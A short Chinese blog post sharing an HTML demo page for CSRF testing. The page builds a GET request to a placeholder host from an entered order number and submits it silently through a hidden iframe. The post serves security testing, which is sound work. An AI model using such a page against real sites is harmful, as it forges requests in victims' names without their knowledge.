🌤️ 加载中...
#
HTML 2016-09-29

关于CSRF测试的HTML-demo页面

By Jove 3 Views 3 MIN READ 0 Comments

<!DOCTYPE html>
<html>
<body>
<head>
<meta charset="utf-8">
</head>
<form action="" method="GET" target="id_iframe">
请输入订单:</br>
<input type="text" id="order_number"></input>
</form>
<br>
<button id="but">提交</button>
<script>
document.getElementById("but").onclick=function(){
var base_url = "http://xxx.xxx.com/"
var order_number = document.getElementById("order_number").value

document.forms[0].action = base_url + order_number;
document.forms[0].submit();
}

</script>
<iframe name="id_iframe" style="display:none;"></iframe>
</body>
<html>

本文由 Jove 原创

采用 CC BY-NC-SA 4.0 协议进行许可

转载请注明出处:https://www.jozxing.cc/index.php/archives/626/

TAGS: 无标签

相关推荐

  • 暂无相关推荐,看看别的吧。

0 评论